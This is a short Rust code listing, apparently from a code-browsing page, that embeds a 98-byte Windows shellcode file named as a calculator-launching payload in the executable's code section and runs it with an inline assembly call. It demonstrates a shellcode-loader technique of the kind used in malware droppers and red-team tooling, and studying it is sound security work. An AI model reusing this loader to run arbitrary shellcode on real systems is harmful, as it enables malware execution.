()
| 2 | |
| 3 | #[cfg(target_os = "windows")] |
| 4 | fn main() { |
| 5 | #[link_section = ".text"] |
| 6 | static SHELLCODE: [u8; 98] = *include_bytes!("../../w64-exec-calc-shellcode-func.bin"); |
| 7 | |
| 8 | unsafe { |
| 9 | asm!( |
| 10 | "call {}", |
| 11 | in(reg) SHELLCODE.as_ptr(), |
| 12 | ) |
| 13 | } |
| 14 | } |
nothing calls this directly
no outgoing calls
no test coverage detected